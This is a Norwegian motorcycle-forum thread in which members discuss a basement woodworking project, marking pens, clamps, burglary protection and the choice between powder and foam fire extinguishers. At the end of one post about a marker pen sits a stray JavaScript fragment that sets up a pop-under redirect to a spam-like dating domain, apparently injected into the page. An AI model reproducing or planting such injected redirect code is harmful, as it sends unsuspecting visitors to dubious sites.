Bjerknez | Sesongen har startet!

Din egen Forum-blogg! Om MC-livet ditt og annet du vil dele med andre.
Svar
Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Bjerknez »

I dag har jeg kjøpt meg en meget flott merkepenn, samt saget til og skrudd fast resten av bordene. Hvis denne plattingen detter ned og jeg får den over meg, så skal jeg gå fra Fredrikstad til Molde neste sommer, med tankveska på ryggen.
20EC023A-87CE-45EA-9F54-B724E21A4EA2.jpeg
CA012DB5-117D-419E-87EF-A7F2029E6574.jpeg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av FredrikE24 »

De blyantene der er kjekke. Har alltid både slik blyant og permanent tusj i arbeidsbuksa :)

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Bjerknez »

Jeg har egentlig innimellom tenkt litt på hvorfor ikke den gamle tømmerblyanten har fått en oppfølger. Men det finnes jaggu meg mye bra der ute som ikke så veldig mange har snakket om :)

Brukeravatar
kjellv
Moderator
Innlegg: 6953
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av kjellv »

Jeg hørte på radioen i dag at det ble advart om voldsom røykutvikling som skapte trafikale problemer over store deler av Fredrikstad i dag. Furtebua og resten av huset sto som du forlot det da du kom hjem fra jobb håper jeg :-k

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Bjerknez »

kjellv skrev: 24 sep 2019, 19:52 Jeg hørte på radioen i dag at det ble advart om voldsom røykutvikling som skapte trafikale problemer over store deler av Fredrikstad i dag. Furtebua og resten av huset sto som du forlot det da du kom hjem fra jobb håper jeg :-k
Jada, var lokalene til Isbilen som tok fyr vistnok. Så da blir det en stund til jeg hører de bjellene i gaten vertfall. Du vet at hvis huset her brenner ned, så står kjellerbenken der like fin etterpå. Er skuddsikkert det funamentet der :knegg

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av FredrikE24 »

Bjerknez skrev: 24 sep 2019, 19:52 Jeg har egentlig innimellom tenkt litt på hvorfor ikke den gamle tømmerblyanten har fått en oppfølger. Men det finnes jaggu meg mye bra der ute som ikke så veldig mange har snakket om :)
Helt klart! Veldig kjekt når man skal merke noe gjennom små hull.
Særlig med denne tusjen.
Den jeg har i buksa nå kjøpte jeg i 2010.. den virker ENDA!
Varer evig. Reklamen sier vel noe sånt som "the marker with 7 lives.."
Bilde

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Bjerknez »

FredrikE24 skrev: 24 sep 2019, 20:03
Bjerknez skrev: 24 sep 2019, 19:52 Jeg har egentlig innimellom tenkt litt på hvorfor ikke den gamle tømmerblyanten har fått en oppfølger. Men det finnes jaggu meg mye bra der ute som ikke så veldig mange har snakket om :)
Helt klart! Veldig kjekt når man skal merke noe gjennom små hull.
Særlig med denne tusjen.
Den jeg har i buksa nå kjøpte jeg i 2010.. den virker ENDA!
Varer evig. Reklamen sier vel noe sånt som "the marker with 7 lives.."
Bilde
Kult. Den må jeg også ha :)

Hva er forskjellen på disse over? Bare fargen?

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av FredrikE24 »

Bare fargen.
Du får også kjøpt refill-flasker. Jeg har ikke hatt behov for det, men har snudd "filten" et par ganger.
Ikke tørker den ut fort heller.. Kan gå opp mot et døgn uten hetta over før den begynner å bli tørr i tuppen. Da bare snur man filten og er på G igjen.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Bjerknez »

Tøft :)

Jeg ser dog for meg at Pica Dry er mer robust. Bly tørker jo ikke ut og virker uansett. Hva er egentlig fordelene med å bruke en "ink" pen til merking? Merket blir jo permanent (før man vasker det bort med kjemikalier) og det er vel stort sett ikke meningen at disse merkene skal synes i etterkant.

Ergonomien tilsier vel også at den ikke er best egnet til bruk som vanlig pen heller (selv om det selvsagt går). Jeg prøvde og merke alt fra plastmateriale til metall og syrefast i går. Selv metall og tre under vann lager den merke på.

Tenk at jeg har brukt tømmerblyanten min så lenge. Den er unøyaktig, vanskeligere å spisse etc.

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Bjerknez »

Da har jeg bestillt meg Bessey limpresser på 60cm. :thumleft

Bilde

Brukeravatar
Audi Mannen
Innlegg: 764
Registrert: 23 mai 2017, 14:13
Motorsykkelen din: Ducati Multistrada V4S
Sted: Ytre Nordmøre

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Audi Mannen »

Med så mye snadder i "bua" bør du vel også legge penger i sikkerhet.... tenker da på sikring mot innbrudd. Alle bildene som ligger her nå er vel nok til å få en middels kjeltring til å bli vår i blikket ;e
Ducati Multistrada V4S - 2021

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Bjerknez »

Har satt inn ny dør nå i sommer, vi har bikkje og alerm merker over alt. Det er stort sett alltid noen hjemme på adressen også. Hvis noen allikevel ser sin trang til å bryte seg inn, så er vi jo forsikret. :)

men med tanke på sikkerhet, så skal jeg vertfall få tak i meg brannslukkingsapparat i kjellern, samt en røkvarsler.

Brukeravatar
kvase
Innlegg: 1064
Registrert: 29 des 2015, 02:35
Motorsykkelen din: KTM 1090 ADV-R/Yamaha WR450F
Sted: Arendal
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av kvase »

brannslukkingsapparat
Pulver gir enormt etterarbeid vis noen skulle finne på å prøve det ut men er kjekt til mye
Skumm er lettvint å få bort i de fleste tilfeller
Vespa Piago 75cc :crazy: Panter 50 cc :D Honda FT 500 cc :thumleft XT660 Z Tennere :thumleft KTM :twothumbs: 1050 ADV-- i stallen nå KTM 1090 ADV-R :prf
i tillegg en Suzuki DRZ 400 :lol
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/

Brukeravatar
Bjerknez
Innlegg: 22864
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Bjerknez »

Tror nok ikke jeg har noen store planer om å teste det inne i kjelleren for morroskyld, men ja, jeg tenker det holder med et skum apparat... Uten at jeg vet forskjellene med tanke på effektivitet etc...

Brukeravatar
Sakkle
Innlegg: 1080
Registrert: 28 aug 2017, 23:57
Motorsykkelen din: KTM 790 Adventure

Re: Bjerknez - Leker snekker i furtebua!

Legg inn av Sakkle »

kvase skrev: 25 sep 2019, 13:54 brannslukkingsapparat
Pulver gir enormt etterarbeid vis noen skulle finne på å prøve det ut men er kjekt til mye
Skumm er lettvint å få bort i de fleste tilfeller
Bjerknez skrev: 25 sep 2019, 13:58 Tror nok ikke jeg har noen store planer om å teste det inne i kjelleren for morroskyld, men ja, jeg tenker det holder med et skum apparat... Uten at jeg vet forskjellene med tanke på effektivitet etc...

Pulver er generelt mer effektivt en skum. I en kjeller der det ikke er noen kjempekrise om man finner pulver i krokene i ettertid ville jeg valgt pulver.

Generelt ville jeg uansett valgt pulver som første valg, og evt. supplere med et skumapparat som du kan bruke til mindre branntilløp innendørs, hvor du har tid til å vurdere etterarbeidet... Det er da mye viktigere å få slukket brannen så huset ikke brenner ned en å tenke på eventuelle konsekvenser av bruken av pulveret?
2019 KTM 790 Adventure
2008 KTM Duke 690

Svar